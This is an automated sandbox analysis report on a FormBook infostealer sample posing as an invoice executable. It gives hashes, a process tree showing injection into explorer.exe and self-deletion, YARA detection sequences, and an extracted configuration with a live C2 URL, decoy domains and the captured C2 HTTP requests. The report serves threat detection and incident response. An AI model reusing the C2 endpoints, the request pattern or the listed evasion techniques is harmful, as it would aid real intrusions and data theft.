Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report EXPORT INVOICE 2021.exe

Overview

General Information

Sample Name:EXPORT INVOICE 2021.exe
Analysis ID:502233
MD5:54bb8fbbfe0a665ca59579a0240ce2f0
SHA1:0b97e4463c76df4541179880902bb6966ef3f894
SHA256:3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • EXPORT INVOICE 2021.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
    • EXPORT INVOICE 2021.exe (PID: 5548 cmdline: {path} MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5860 cmdline: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        2.2.EXPORT INVOICE 2021.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.EXPORT INVOICE 2021.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1688, ProcessCommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', ProcessId: 5860

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: EXPORT INVOICE 2021.exeVirustotal: Detection: 32%Perma Link
          Source: EXPORT INVOICE 2021.exeMetadefender: Detection: 17%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: EXPORT INVOICE 2021.exeJoe Sandbox ML: detected
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: EXPORT INVOICE 2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: EXPORT INVOICE 2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kalitelihavaperdesi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.161.86.13 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.165 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ratqueen.art
          Source: C:\Windows\explorer.exeDomain query: www.piedmontpines.school
          Source: C:\Windows\explorer.exeDomain query: www.yuezhong66.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.vulcanopresale.icu/mqi9/
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
          Source: global trafficHTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1Host: www.ratqueen.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1Host: www.piedmontpines.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: EXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: unknownDNS traffic detected: queries for: www.ratqueen.art
          Source: global trafficHTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1Host: www.ratqueen.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1Host: www.piedmontpines.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B8C62_2_0041B8C6
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041C12C2_2_0041C12C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CBC52_2_0041CBC5
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041BBDF2_2_0041BBDF
